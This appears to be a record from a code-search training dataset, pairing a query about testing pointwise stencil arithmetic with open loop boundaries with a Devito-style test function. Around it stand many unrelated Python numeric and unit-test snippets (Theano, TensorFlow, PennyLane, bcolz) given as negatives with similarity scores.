unsigned integers,\n # we must check if the gap contains\n # negative numbers.\n if dtype.startswith(\"uint\"):\n if self.gap and len(self.gap) == 2 and self.gap[0] < 0:\n if self.gap[1] >= 1:\n self.gap = (0, self.gap[1])\n else:\n raise TypeError(\n \"Gap not suitable for\", dtype, self.__name__\n )\n\n variable, data = sparse_random_inputs(\n format, shape=(4, 7), out_dtype=dtype, gap=self.gap\n )\n\n f = aesara.function(variable, self.op(*variable))\n\n tested = f(*data)\n data = [m.toarray() for m in data]\n expected = self.expected_f(*data)\n\n assert tested.format == format\n tested = tested.toarray()\n\n try:\n utt.assert_allclose(expected, tested)\n except AssertionError:\n raise AssertionError(self.__name__)\n\n # Test with int8 as dtype\n # These tests are not in the loop for two reasons.\n # First, in recent version of numpy, when a numpy\n # function have int8 as input dtype, it returns a\n # float16 as output dtype. Since this does not provide\n # enough precision, we upcast the data before we apply the\n # function.\n # Second, the tolerance for the checkup in DebugMode\n # is too high.\n for dtype in [\"int8\", \"uint8\"]:\n if dtype in test_dtypes:\n if self.gap:\n domain = self.gap\n # When testing with unsigned integers,\n # we must check if the gap contains\n # negative numbers.\n if dtype == \"uint8\":\n if len(domain) == 2 and domain[0] < 0:\n if domain[1] >= 1:\n domain = (0, domain[1])\n else:\n raise TypeError(\n \"Gap not suitable for\", dtype, self.__name__\n )\n\n else:\n domain = (0, 5)\n\n variable, data = sparse_random_inputs(\n format, shape=(4, 7), out_dtype=dtype, gap=domain\n )\n\n f = aesara.function(variable, self.op(*variable))\n\n old_value = (\n tensor.math.float32_atol,\n tensor.math.float32_rtol,\n tensor.math.float64_atol,\n tensor.math.float64_rtol,\n )\n tensor.math.float32_atol = 1e-4\n tensor.math.float32_rtol = 1e-3\n tensor.math.float64_atol = 1e-3\n tensor.math.float64_rtol = 1e-4\n try:\n tested = f(*data)\n finally:\n (\n tensor.math.float32_atol,\n tensor.math.float32_rtol,\n tensor.math.float64_atol,\n tensor.math.float64_rtol,\n ) = old_value\n\n data = [m.toarray().astype(\"float32\") for m in data]\n expected = self.expected_f(*data)\n\n assert tested.format == format\n tested = tested.toarray()\n\n try:\n utt.assert_allclose(tested, expected, rtol=1e-2)\n except AssertionError:\n raise AssertionError(self.__name__)\n\n if grad_test:\n\n def test_grad(self):\n for format in sparse.sparse_formats:\n for dtype in sparse.float_dtypes:\n variable, data = sparse_random_inputs(\n format, shape=(4, 7), out_dtype=dtype, gap=self.gap_grad\n )\n\n verify_grad_sparse(self.op, data, structured=True)\n\n # Set proper class name to uniquely identify tests.\n # Note that it is important to run this code *outside* of the `Tester`\n # class itself, otherwise it will not work properly for some reason.\n if name is None:\n name = op.__name__.capitalize() + \"Tester\"\n TestElemwise.__name__ = name\n if hasattr(TestElemwise, \"__qualname__\"):\n TestElemwise.__qualname__ = name\n assert \"Roundhalftoeven\" not in TestElemwise.__name__\n\n return TestElemwise", "def structured_pow(x, y):\r\n # see decorator for function body\r", "def test_apply_flags():\n true_value = dqflags.pixel['HOT'] + dqflags.pixel['DO_NOT_USE']\n\n print(true_value)\n\n badmap = np.zeros((10, 10), dtype=np.int)\n true_map = np.zeros((10, 10), dtype=np.uint32)\n for i in range(10):\n badmap[i, i] = 1\n true_map[i, i] = true_value\n\n\n print(true_map)\n\n\n flag_names = ['HOT', 'DO_NOT_USE']\n pixmap = bpd.apply_flags(badmap, flag_names)\n\n\n print(pixmap)\n\n\n assert np.all(pixmap == true_map)", "def testNestedFunctionGradientCall(self):\n check_numerics_callback.enable_check_numerics()\n\n x = constant_op.constant(1.0 - 1e-8, dtype=dtypes.float32)\n\n @def_function.function\n def asinp1(x):\n # asin()'s gradient overflows at the value close to 1.0.\n return math_ops.asin(x) + 1.0\n\n @def_function.function\n def loss(x):\n return math_ops.square(asinp1(x))\n\n with backprop.GradientTape() as tape:\n tape.watch(x)\n y = loss(x)\n message = self._assertRaisesInvalidArgumentErrorAndGetMessage(\n lambda: self.evaluate(tape.gradient(y, x)))\n self.assertTrue(re.search(r\"gradient\", message))", "def test_verify():\n Lx = 10; Ly = 10; c = 1.0\n\n def I(x, y):\n return exp(-pow(x-Lx/2.0,2)/2.0 -pow(y-Ly/2.0,2)/2.0)\n def f(x, y, t):\n return sin(2*x) + y\n def bc(x, y, t):\n return sin(t)\n\n # use string formulas instead so also weave can be tested:\n # (need to transfer globals() so that vectorized versions work)\n I = StringFunction('exp(-pow(x-Lx/2.0,2)/2.0 - pow(y-Ly/2.0,2)/2.0)',\n independent_variables=('x', 'y'),\n Lx=Lx, Ly=Ly, globals=globals())\n f = StringFunction('sin(2*x) + y',\n independent_variables=('x', 'y', 't'),\n globals=globals())\n bc = StringFunction('sin(t)',\n independent_variables=('x', 'y', 't'),\n globals=globals())\n\n #nx = 15; ny = 10; tstop = 2\n nx = 4; ny = 3; tstop = 16\n verify_implementations(I, f, c, bc, Lx, Ly, nx, ny, tstop)", "def _set_bounds(b, x, n):\n for j in range(1, n - 1):\n for i in range(1, n - 1):\n x[index_of(i, j, 0, n)] = -x[index_of(i, j, 1, n)] if b == 3 else x[index_of(i, j, 1, n)]\n x[index_of(i, j, 0, n - 1)] = -x[index_of(i, j, 1, n - 2)] if b == 3 else x[index_of(i, j, 1, n - 2)]\n for k in range(1, n - 1):\n for i in range(1, n - 1):\n x[index_of(i, 0, k, n)] = -x[index_of(i, 1, k, n)] if b == 2 else x[index_of(i, 1, k, n)]\n x[index_of(i, n - 1, 0, n - 1)] = -x[index_of(i, n - 2, k, n - 2)] if b == 2 else x[\n index_of(i, n - 2, k, n - 2)]\n for k in range(1, n - 1):\n for j in range(1, n - 1):\n x[index_of(0, j, k, n)] = -x[index_of(1, j, k, n)] if b == 1 else x[index_of(1, j, k, n)]\n x[index_of(n - 1, j, k, n - 1)] = -x[index_of(n - 2, j, k, n)] if b == 1 else x[\n index_of(n - 2, j, k, n)]\n\n x[index_of(0, 0, 0, n)] = 1 / 3 * (x[index_of(1, 0, 0, n)] + x[index_of(0, 1, 0, n)] + x[index_of(0, 0, 1, n)])\n x[index_of(0, n - 1, 0, n)] = 1 / 3 * (\n x[index_of(1, n - 1, 0, n)] + x[index_of(0, n - 2, 0, n)] + x[index_of(0, n - 1, 1, n)])\n x[index_of(0, 0, n - 1, n)] = 1 / 3 * (\n x[index_of(1, 0, n - 1, n)] + x[index_of(0, 1, n - 1, n)] + x[index_of(0, 0, n - 2, n)])\n x[index_of(0, n - 1, n - 1, n)] = 1 / 3 * (\n x[index_of(1, n - 1, n - 1, n)] + x[index_of(0, n - 2, n - 1, n)] + x[index_of(0, n - 1, n - 2, n)])\n x[index_of(n - 1, 0, 0, n)] = 1 / 3 * (\n x[index_of(n - 2, 0, 0, n)] + x[index_of(n - 1, 1, 0, n)] + x[index_of(n - 1, 0, 1, n)])\n x[index_of(n - 1, n - 1, 0, n)] = 1 / 3 * (\n x[index_of(n - 2, n - 1, 0, n)] + x[index_of(n - 1, n - 2, 0, n)] + x[index_of(n - 1, n - 1, 1, n)])\n x[index_of(n - 1, 0, n - 1, n)] = 1 / 3 * (\n x[index_of(n - 2, 0, n - 1, n)] + x[index_of(n - 1, 1, n - 1, n)] + x[index_of(n - 1, 0, n - 2, n)])\n x[index_of(n - 1, n - 1, n - 1, n)] = 1 / 3 * (\n x[index_of(n - 2, n - 1, n - 1, n)] + x[index_of(n - 1, n - 2, n - 1, n)] + x[\n index_of(n - 1, n - 1, n - 2, n)])", "def TestFunc2(x):\r\n return 10*(-0.02*x[0] + 0.5*x[0]*x[0] + x[1])**2 \\\r\n + 128*(-0.02*x[0] + 0.5*x[0]*x[0] - x[1]/4) \\\r\n - (8e-5)*x[0]", "def test0321_2d_numerical_comparison_on_vs_np_batchsize1(\n self,\n batch_size=1,\n num_features=16,\n height=45,\n width=64,\n alpha_fwd=0.99,\n alpha_bkw=0.99,\n itrs=16,\n ):\n # create inputs\n np_inputs = np.random.randn(batch_size, num_features, height, width) + .25\n # instantiate gradient at the output\n np_grad_out = np.random.randn(batch_size, num_features, height, width) + .125\n\n self.template_numerical_comparison_on_vs_np(\n np_inputs,\n np_grad_out=np_grad_out,\n axis=1,\n alpha_fwd=alpha_fwd,\n alpha_bkw=alpha_bkw,\n itrs=itrs,\n )", "def test_independent_parameter(self, mocker):\r\n spy = mocker.spy(qml.gradients.finite_difference, \"generate_shifted_tapes\")\r\n\r\n with qml.tape.JacobianTape() as tape:\r\n qml.RX(0.543, wires=[0])\r\n qml.RY(-0.654, wires=[1])\r\n qml.expval(qml.PauliZ(0))\r\n\r\n dev = qml.device(\"default.qubit\", wires=2)\r\n tapes, fn = finite_diff(tape)\r\n res = fn(dev.batch_execute(tapes))\r\n assert res.shape == (1, 2)\r\n\r\n assert len(spy.call_args_list) == 1\r\n\r\n # only called for parameter 0\r\n assert spy.call_args[0][0:2] == (tape, 0)", "def test_deep(self, expr, result, mode):\n i, j, k, l = dimify('i j k l')\n a = symbol(name='a', dimensions=(i, j, k, l), value=2., mode=mode)\n b = symbol(name='b', dimensions=(j, k), value=3., mode=mode)\n fa = a.base.function if mode == 'indexed' else a\n fb = b.base.function if mode == 'indexed' else b\n\n eqn = eval(expr)\n Operator(eqn)(fa, fb)\n assert np.allclose(fa.data, result, rtol=1e-12)", "def test_simple_3d(self):\r\n a = tt.dtensor3()\r\n increment = tt.dscalar()\r\n sl1 = slice(None)\r\n sl2_end = tt.lscalar()\r\n sl2 = slice(sl2_end)\r\n sl3 = 2\r\n\r\n for do_set in [True, False]:\r\n print \"Set\", do_set\r\n\r\n if do_set:\r\n resut = tt.set_subtensor(a[sl1, sl3, sl2], increment)\r\n else:\r\n resut = tt.inc_subtensor(a[sl1, sl3, sl2], increment)\r\n\r\n f = theano.function([a, increment, sl2_end], resut)\r\n\r\n val_a = numpy.ones((5, 3, 4))\r\n val_inc = 2.3\r\n val_sl2_end = 2\r\n\r\n expected_result = numpy.copy(val_a)\r\n result = f(val_a, val_inc, val_sl2_end)\r\n\r\n if do_set:\r\n expected_result[:, sl3, :val_sl2_end] = val_inc\r\n else:\r\n expected_result[:, sl3, :val_sl2_end] += val_inc\r\n\r\n utt.assert_allclose(result, expected_result)", "def test_annular_fpm():\n\n # test some semi-random cases - is the array size as expected? \n assert masks.annular_fpm(3, 2, np.inf).shape == (3*2*2, 3*2*2)\n assert masks.annular_fpm(3, 5, np.inf).shape == (3*5*2, 3*5*2)\n assert masks.annular_fpm(3, 5, 10).shape == (3*10*2, 3*10*2)\n assert masks.annular_fpm(3, 5, 11).shape == (3*11*2, 3*11*2)\n\n # test some pixel values are as expected. \n mask = masks.annular_fpm(3, 2, 10)\n assert mask[0,0]==0 # corner is black\n assert mask[5*10, 5*10]==1 # in between is white\n assert mask[3*10, 3*10]==0 # center is black", "def attest_ind (a, b, dimension=None, printit=0, name1='Samp1', name2='Samp2',writemode='a'):\r\n if dimension == None:\r\n a = N.ravel(a)\r\n b = N.ravel(b)\r\n dimension = 0\r\n x1 = amean(a,dimension)\r\n x2 = amean(b,dimension)\r\n v1 = avar(a,dimension)\r\n v2 = avar(b,dimension)\r\n n1 = a.shape[dimension]\r\n n2 = b.shape[dimension]\r\n df = n1+n2-2\r\n svar = ((n1-1)*v1+(n2-1)*v2) / float(df)\r\n zerodivproblem = N.equal(svar,0)\r\n svar = N.where(zerodivproblem,1,svar) # avoid zero-division in 1st place\r\n t = (x1-x2)/N.sqrt(svar*(1.0/n1 + 1.0/n2)) # N-D COMPUTATION HERE!!!!!!\r\n t = N.where(zerodivproblem,1.0,t) # replace NaN/wrong t-values with 1.0\r\n probs = abetai(0.5*df,0.5,float(df)/(df+t*t))\r\n\r\n if type(t) == N.ndarray:\r\n probs = N.reshape(probs,t.shape)\r\n if probs.shape == (1,):\r\n probs = probs[0]\r\n \r\n if printit <> 0:\r\n if type(t) == N.ndarray:\r\n t = t[0]\r\n if type(probs) == N.ndarray:\r\n probs = probs[0]\r\n statname = 'Independent samples T-test.'\r\n outputpairedstats(printit,writemode,\r\n name1,n1,x1,v1,N.minimum.reduce(N.ravel(a)),\r\n N.maximum.reduce(N.ravel(a)),\r\n name2,n2,x2,v2,N.minimum.reduce(N.ravel(b)),\r\n N.maximum.reduce(N.ravel(b)),\r\n statname,t,probs)\r\n return\r\n return t, probs", "def test_ex_2_3(self):\n\n wam = WAM()\n wam.execute(self.fig_2_3_instrs)\n aW = wam.deref_reg(5)\n aZ = wam.deref_reg(2)\n wam.execute(self.fig_2_4_instrs)\n aX = wam.deref_reg(5)\n aY = wam.deref_reg(4)\n self.assertEqual(wam.get_term_repr(aW), 'f(a)')\n self.assertEqual(wam.get_term_repr(aX), 'f(a)')\n self.assertEqual(wam.get_term_repr(aY), 'f(f(a))')\n self.assertEqual(wam.get_term_repr(aZ), 'f(f(a))')", "def test0221_2d_numerical_comparison_on_fprop_vs_np_batchsize1(\n self,\n batch_size=1,\n num_features=16,\n height=45,\n width=64,\n alpha_fwd=0.99,\n alpha_bkw=0.99,\n itrs=16,\n ):\n # create inputs\n np_inputs = np.random.randn(batch_size, num_features, height, width) + .25\n\n self.template_numerical_comparison_on_vs_np(\n np_inputs,\n np_grad_out=None,\n axis=1,\n alpha_fwd=alpha_fwd,\n alpha_bkw=alpha_bkw,\n itrs=itrs,\n )", "def test_local_dot22_to_dot22scalar():\r\n A = T.dmatrix()\r\n mode = theano.compile.mode.get_default_mode()\r\n opt = theano.tensor.opt.in2out(\r\n theano.tensor.blas.local_dot22_to_dot22scalar)\r\n mode = mode.__class__(optimizer=opt)\r\n\r\n x = T.dscalar()\r\n y = T.dscalar()\r\n z = T.dscalar()\r\n # make sure to don't have dimshuffle as we don't opt those cases\r\n m = T.dmatrix()\r\n r = T.drow()\r\n for idx, node in enumerate([\r\n #Old working cases\r\n T.mul(_dot22(A, A), x),\r\n T.mul(_dot22(A, A), x, y),\r\n T.mul(_dot22(A, A), x, r),\r\n T.mul(_dot22(A, A), m, x),\r\n T.mul(_dot22(A, A), x, m),\r\n T.mul(_dot22(A, A), x, (m * y)),\r\n T.mul(_dot22(A, A), (m * y), x),\r\n T.mul(_dot22(A, A), x, (r * y)),\r\n T.mul(_dot22(A, A), (r * y), x),\r\n T.mul(_dot22(A, A), (x * y), (m * x)),\r\n T.mul(_dot22(A, A), (r * y), (y * x)),\r\n\r\n # Case that was raising an assert that is fixed in gh-1507\r\n T.mul(_dot22(A, A), (m * y), m),\r\n T.mul(_dot22(A, A), m, (m * y)),\r\n T.mul(_dot22(A, A), (r * y), (m * x)),\r\n\r\n # assert fixed in gh-1507 and opt case added in gh-1515\r\n T.mul(_dot22(A, A), (m * y * z), m),\r\n T.mul(_dot22(A, A), m, (m * y * z)),\r\n\r\n # Opt case added in gh-1515\r\n T.mul(_dot22(A, A), T.mul(m, y, z), m),\r\n T.mul(_dot22(A, A), m, T.mul(m, y, z)),\r\n\r\n #Case that opt later in gh-1515\r\n T.mul(_dot22(A, A), (r * m), (m * x)),\r\n ]):\r\n node2 = theano.tensor.blas.local_dot22_to_dot22scalar.transform(\r\n node.owner)\r\n assert node2\r\n f = theano.function([x, y, z, m, r, A], node,\r\n mode=mode, on_unused_input='ignore')\r\n f(.1, .2, .3, [[1, 2], [3, 4]], [[5, 6]], [[7, 8], [9, 10]])", "def mem_update(ops, x, mem, spike):\n #print(ops(x).size())\n #print(spike.size())\n mem = mem * decay * (1. - spike) + ops(x)\n spike = act_fun(mem) # act_fun : approximation firing function\n return mem, spike", "def test_grad_vector(func, motion, optimized, preserve_result, x):\n utils.test_reverse_array(func, motion, optimized, preserve_result, x)", "def test07(self):\n a, b = np.arange(self.N), np.arange(1, self.N+1)\n c, d = bcolz.carray(a, rootdir=self.rootdir), b\n cr = c[\"a + 2 * d - 3 > 0\"]\n nr = a[(a + 2 * b - 3) > 0]\n # print \"ca[expr] ->\", cr\n # print \"numpy ->\", nr\n assert_array_equal(cr[:], nr, \"carray[expr] does not work correctly\")", "def test_matrix22(gridsize=50):\n\n v1 = vec2(3,0)\n v2 = vec2(0,3)\n\n #rotate 45 degrees \n m22 = matrix22()\n m22.from_euler(45)\n\n # make a second matrix, also 45 degrees, should give us 90 total \n m22_2 = matrix22()\n m22_2.from_euler(45)\n m22 = m22_2 * m22\n\n # mutliply a vector by the matrix \n v3 = m22 * v2 \n\n fb = pixel_op() \n fb.create_buffer(800, 800)\n fb.graticule(gridsize)\n \n pts = [ (0,0), (0,1), (2,1), (0,2) ]\n #bloody_simple_2drender('2d_rotation.png', pts=pts, gridsize=50, pfb=fb)\n\n vecs = [v2,v3]\n bloody_simple_2drender('2d_rotation.png', vecs=vecs, gridsize=50, pfb=fb)\n\n #rotate the points by matrix multiplication \n pts = m22.batch_mult_pts(pts) \n bloody_simple_2drender('2d_rotation.png', pts=pts, gridsize=50, pfb=fb)\n fb.save('2d_rotation.png')", "def loc_eval(x, b):\r\n loc_est = 0\r\n for i in enumerate(b): loc_est+=i[1]*(x**i[0])\r\n return(loc_est)" ]
[ "0.70109046", "0.5731927", "0.5725207", "0.5534058", "0.5485873", "0.54508567", "0.5420271", "0.5402067", "0.53938526", "0.5361206", "0.53606236", "0.5359261", "0.5359202", "0.5320887", "0.5293664", "0.5291382", "0.5265721", "0.52385396", "0.523383", "0.52290106", "0.52282166", "0.52210116", "0.52201825", "0.52003807", "0.52002525", "0.51925", "0.5190279", "0.517582", "0.5171569", "0.5146713", "0.51125073", "0.51123774", "0.50978607", "0.50955325", "0.5090912", "0.50880325", "0.50740653", "0.5071987", "0.50706035", "0.5070082", "0.5057871", "0.50481606", "0.5044593", "0.50376034", "0.50371355", "0.5036854", "0.50213027", "0.50172997", "0.50147253", "0.50146693", "0.500944", "0.5008418", "0.5004359", "0.50037366", "0.50023204", "0.5002317", "0.5001583", "0.49806282", "0.49805528", "0.49785385", "0.4961971", "0.4958011", "0.49392173", "0.4914446", "0.49130878", "0.49093792", "0.4898081", "0.48907334", "0.48811746", "0.48791227", "0.48775607", "0.4875819", "0.48648772", "0.4864752", "0.48561007", "0.48539585", "0.48535743", "0.48447603", "0.48419723", "0.48402712", "0.48342207", "0.48335135", "0.4832914", "0.48265654", "0.4824387", "0.4822452", "0.48208398", "0.4820327", "0.48199952", "0.48177442", "0.48174328", "0.48074389", "0.4804056", "0.48031142", "0.48018813", "0.4797731", "0.4794664", "0.47879082", "0.4786367", "0.47737578" ]
0.5903518
1
Test pointwise arithmetic with stencil offsets and open loop boundaries in indexed expression format
def test_indexed_open_loops(self, expr, result): i, j, l = dimify('i j l') pushed = [d.size for d in [j, l]] j.size = None l.size = None a = DenseData(name='a', dimensions=(i, j, l), shape=(3, 5, 6)).indexed fa = a.function fa.data[0, :, :] = 2. eqn = eval(expr) Operator(eqn)(fa) assert np.allclose(fa.data[1, 1:-1, 1:-1], result[1:-1, 1:-1], rtol=1e-12) j.size, l.size = pushed
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_indexed_stencil(self, expr, result):\n j, l = dimify('j l')\n a = symbol(name='a', dimensions=(j, l), value=0., mode='indexed').base\n fa = a.function\n b = symbol(name='b', dimensions=(j, l), value=2., mode='indexed').base\n fb = b.function\n\n eqn = eval(expr)\n Operator(eqn)(fa, fb)\n assert np.allclose(fa.data[1:-1, 1:-1], result[1:-1, 1:-1], rtol=1e-12)", "def test_indexed_buffered(self, expr, result):\n i, j, l = dimify('i j l')\n a = symbol(name='a', dimensions=(i, j, l), value=2., mode='indexed').base\n fa = a.function\n\n eqn = eval(expr)\n Operator(eqn)(fa)\n assert np.allclose(fa.data[1, 1:-1, 1:-1], result[1:-1, 1:-1], rtol=1e-12)", "def _evaluable_view(self, stencil, arr, offset=0):\n if self.dim == 1:\n if isinstance(stencil, Stencil):\n\n l = self.borders[0]-stencil.b[0][0]\n r = -(self.borders[1]-stencil.b[0][1])\n else:\n l = self.borders[0]-stencil[0][0]\n r = -(self.borders[1]-stencil[0][1])\n return arr[l+offset: r+offset]\n else:\n raise NotImplementedError(\"Another dimension than one \"\n \"is not supplied\")", "def test_indexed_increment(self, expr, result):\n j, l = dimify('j l')\n a = symbol(name='a', dimensions=(j, l), value=2., mode='indexed').base\n fa = a.function\n fa.data[1:, 1:] = 0\n\n eqn = eval(expr)\n Operator(eqn)(fa)\n assert np.allclose(fa.data, result, rtol=1e-12)", "def test_directly_indexed_expression(self, fa, ti0, t0, exprs):\n eqs = EVAL(exprs, ti0.base, t0)\n op = Operator(eqs, dse='noop', dle='noop')\n trees = retrieve_iteration_tree(op)\n assert len(trees) == 2\n assert trees[0][-1].nodes[0].expr.rhs == eqs[0].rhs\n assert trees[1][-1].nodes[0].expr.rhs == eqs[1].rhs", "def test_offsets():\n B = 100\n H = 20\n E = 210000\n sections = ((B, H, 0, E),)\n sections2 = ((B, H, 12.435, E),)\n EI, top, bot = bm.EI(sections, E)\n EI2, top2, bot2 = bm.EI(sections2, E)\n assert 0.99 < EI / EI2 < 1.01\n assert 0.99 < top / top2 < 1.01\n assert 0.99 < bot / bot2 < 1.01", "def test():\n Z = func.evaluate_circuit(F, e_x, e_y, e_xor)\n if Z == d[0]:\n return 0\n elif Z == d[1]:\n return 1", "def test_var_idx_in_modes(self, arr, parse_input_mocked_metadata):\n bb = parse_input_mocked_metadata(\n \"int array vars =\\n{}\\nMZgate(0, 1) | [vars[0], vars[1], vars[2]]\".format(arr)\n )\n assert bb.operations == [\n {'op': 'MZgate', 'args': [0, 1], 'kwargs': {}, 'modes': [1, 2, 3]}\n ]", "def _inside_op_range(self, idx):\n\n if idx < self._parameters.op_range[0]:\n return False\n return (self._parameters.op_range[1] < 0 or\n idx <= self._parameters.op_range[1])", "def test_lifted_index():\n pressure = np.array([1014., 1000., 997., 981.2, 947.4, 925., 914.9, 911.,\n 902., 883., 850., 822.3, 816., 807., 793.2, 770.,\n 765.1, 753., 737.5, 737., 713., 700., 688., 685.,\n 680., 666., 659.8, 653., 643., 634., 615., 611.8,\n 566.2, 516., 500., 487., 484.2, 481., 475., 460.,\n 400.]) * units.hPa\n temperature = np.array([24.2, 24.2, 24., 23.1, 21., 19.6, 18.7, 18.4,\n 19.2, 19.4, 17.2, 15.3, 14.8, 14.4, 13.4, 11.6,\n 11.1, 10., 8.8, 8.8, 8.2, 7., 5.6, 5.6,\n 5.6, 4.4, 3.8, 3.2, 3., 3.2, 1.8, 1.5,\n -3.4, -9.3, -11.3, -13.1, -13.1, -13.1, -13.7, -15.1,\n -23.5]) * units.degC\n dewpoint = np.array([23.2, 23.1, 22.8, 22., 20.2, 19., 17.6, 17.,\n 16.8, 15.5, 14., 11.7, 11.2, 8.4, 7., 4.6,\n 5., 6., 4.2, 4.1, -1.8, -2., -1.4, -0.4,\n -3.4, -5.6, -4.3, -2.8, -7., -25.8, -31.2, -31.4,\n -34.1, -37.3, -32.3, -34.1, -37.3, -41.1, -37.7, -58.1,\n -57.5]) * units.degC\n parcel_prof = parcel_profile(pressure, temperature[0], dewpoint[0])\n li = lifted_index(pressure, temperature, parcel_prof)\n assert_almost_equal(li, -7.9115691 * units.delta_degree_Celsius, 2)", "def bitwise_stats(traces, N, delta):\n \n X = np.zeros((N,),dtype=int)\n padded_traces = pad_traces(traces, N)\n num_traces = padded_traces.shape[0]\n \n p = np.zeros(N)\n for j in range(N):\n p[j] = np.sum(padded_traces[:,j])/num_traces\n \n c = np.concatenate((np.ones(N,), np.zeros(N,)), axis=None)\n bounds = (0,1)\n \n for i in range(N):\n A_ub = np.zeros((2*N,2*N))\n for j in range(N):\n for k in range(N):\n if j == k:\n A_ub[j,k] = -1\n A_ub[j+N,k] = -1\n A_ub[j,k+N] = alpha(j+1,k+1,delta)\n A_ub[j+N,k+N] = -1*A_ub[j,k+N]\n elif k > j:\n A_ub[j,k+N] = alpha(j+1,k+1,delta)\n A_ub[j+N,k+N] = -1*A_ub[j,k+N]\n \n b_ub = np.concatenate((p,-1*p), axis=None)\n \n A_eq0 = np.zeros((i+1,2*N))\n b_eq0 = np.zeros(i+1)\n for j in range(i+1):\n A_eq0[j,j+N] = 1\n if j==i:\n b_eq0[j] = 0\n else:\n b_eq0[j] = X[j]\n \n A_eq1 = np.zeros((i+1,2*N))\n b_eq1 = np.zeros(i+1)\n for j in range(i+1):\n A_eq1[j,j+N] = 1\n if j==i:\n b_eq1[j] = 1\n else:\n b_eq1[j] = X[j]\n \n res0 = linprog(c,A_ub,b_ub,A_eq0,b_eq0,bounds,method='interior-point')\n res1 = linprog(c,A_ub,b_ub,A_eq1,b_eq1,bounds,method='interior-point')\n if res0.fun < res1.fun:\n X[i] = 0\n else:\n X[i] = 1\n \n return X", "def test_current_density_boundaries(self):\n t, x_n, x_p = self.t, self.x_n_edge, self.x_p_edge\n\n current_param = self.model.param.current_with_time\n\n i_cell = self.param.process_symbol(current_param).evaluate(t=t)\n np.testing.assert_array_almost_equal(self.i_s_n(t, x_n[0]), i_cell, decimal=2)\n np.testing.assert_array_almost_equal(self.i_s_n(t, x_n[-1]), 0, decimal=4)\n np.testing.assert_array_almost_equal(self.i_s_p(t, x_p[-1]), i_cell, decimal=3)\n np.testing.assert_array_almost_equal(self.i_s_p(t, x_p[0]), 0, decimal=4)", "def test_output_range(self):\n byt = bytscl(self.array1)\n outside = (byt < 0) | (byt > 255)\n total = numpy.sum(outside)\n self.assertEqual(total, 0)", "def test_special_XYX(self, angexp):\n a, b, c, d = angexp[0]\n exp = {(\"rx\", \"ry\")[g]: angexp[1][g] for g in (0, 1) if angexp[1][g]}\n tgt = np.exp(1j * d) * RXGate(b).to_matrix() @ RYGate(a).to_matrix() @ RXGate(c).to_matrix()\n self.check_oneq_special_cases(tgt, \"XYX\", exp)", "def test_grad_binary_int(func, motion, optimized, preserve_result, a, n):\n utils.test_reverse_array(func, motion, optimized, preserve_result, a, n)", "def coordination(c, stencil=nn_stencil):\n\n coordination = np.zeros_like(c, dtype=int)\n for dx, dy in stencil:\n tmp = np.array(c, dtype=bool, copy=True)\n if dx != 0:\n tmp = np.roll(tmp, dx, 0)\n if dy != 0:\n tmp = np.roll(tmp, dy, 1)\n coordination += tmp\n return coordination", "def test_amp_sums_can_be_simplified(free_alg):\n dr = free_alg\n v = dr.names.v\n n, i, j = symbols('n i j')\n x = IndexedBase('x')\n r = Range('D', 0, n)\n\n tensor = dr.sum((i, r), (j, r), i ** 2 * x[j] * v[j])\n res = tensor.simplify_sums()\n assert res == dr.sum((j, r), (\n n ** 3 / 3 - n ** 2 / 2 + n / 6\n ) * x[j] * v[j])", "def test_var_idx_in_args(self, parse_input_mocked_metadata):\n bb = parse_input_mocked_metadata(\n \"float array vars =\\n\\t0.5, 1\\n\\nMZgate(vars[0], vars[1]) | [0, 1]\"\n )\n assert bb.operations == [\n {'op': 'MZgate', 'args': [0.5, 1.0], 'kwargs': {}, 'modes': [0, 1]}\n ]", "def test_get_debug_values_success():\r\n\r\n prev_value = config.compute_test_value\r\n for mode in ['ignore', 'warn', 'raise']:\r\n\r\n try:\r\n config.compute_test_value = mode\r\n\r\n x = T.vector()\r\n x.tag.test_value = numpy.zeros((4,), dtype=config.floatX)\r\n y = numpy.zeros((5, 5))\r\n\r\n iters = 0\r\n\r\n for x_val, y_val in op.get_debug_values(x, y):\r\n\r\n assert x_val.shape == (4,)\r\n assert y_val.shape == (5, 5)\r\n\r\n iters += 1\r\n\r\n assert iters == 1\r\n\r\n finally:\r\n config.compute_test_value = prev_value", "def test07(self):\n a, b = np.arange(self.N), np.arange(1, self.N+1)\n c, d = bcolz.carray(a, rootdir=self.rootdir), b\n cr = c[\"a + 2 * d - 3 > 0\"]\n nr = a[(a + 2 * b - 3) > 0]\n # print \"ca[expr] ->\", cr\n # print \"numpy ->\", nr\n assert_array_equal(cr[:], nr, \"carray[expr] does not work correctly\")", "def test_conservation(self):\n t, x_n, x_s, x_p = self.t, self.x_n, self.x_s, self.x_p\n\n current_param = self.model.param.current_with_time\n\n i_cell = self.param.process_symbol(current_param).evaluate(t=t)\n for x in [x_n, x_s, x_p]:\n np.testing.assert_array_almost_equal(\n self.i_s(t, x) + self.i_e(t, x), i_cell, decimal=2\n )\n np.testing.assert_array_almost_equal(\n self.i_s(t, x_n), self.i_s_n(t, x_n), decimal=3\n )\n np.testing.assert_array_almost_equal(\n self.i_s(t, x_p), self.i_s_p(t, x_p), decimal=3\n )", "def at_loc((x, y), (cx, cy), eps=0.000035):\n\treturn (x - cx)**2 + (y - cy)**2 <= eps**2", "def test_outside_plus_inside(self):\n for region, bounds in load_region_bounds_dict().items():\n lon_bounds, lat_bounds = bounds\n for key in ['data01', 'ds_shift_lon', 'ds_rev_both', 'ds_irr_both']:\n outside_data = climapy.xr_mask_bounds(data_dict[key],\n lon_bounds=lon_bounds, lat_bounds=lat_bounds,\n select_how='outside')['PRECL']\n inside_data = climapy.xr_mask_bounds(data_dict[key],\n lon_bounds=lon_bounds, lat_bounds=lat_bounds,\n select_how='inside')['PRECL']\n outside_plus_inside = (np.nan_to_num(outside_data.values) +\n np.nan_to_num(inside_data.values))\n diff_from_input = outside_plus_inside - data_dict[key]['PRECL'].values\n assert np.abs(diff_from_input).max() == 0", "def test_sum_pos_3() -> None:\n # 2nd step - 3rd square\n assert nth(sw.sum_walk(), 1) == 2", "def test_sum_pos_4() -> None:\n # Third step, 4th square.\n assert nth(sw.sum_walk(), 2) == 4", "def unityTestChangeOfCoordinates(map, ClosedLoopData):\n TestResult = 1\n for i in range(0, ClosedLoopData.x.shape[0]):\n xdat = ClosedLoopData.x\n xglobdat = ClosedLoopData.x_glob\n\n s, ey, _, _ = map.getLocalPosition(xglobdat[i, 4], xglobdat[i, 5], xglobdat[i, 3])\n v1 = np.array([s, ey])\n v2 = np.array(xdat[i, 4:6])\n v3 = np.array(map.getGlobalPosition(v1[0], v1[1]))\n 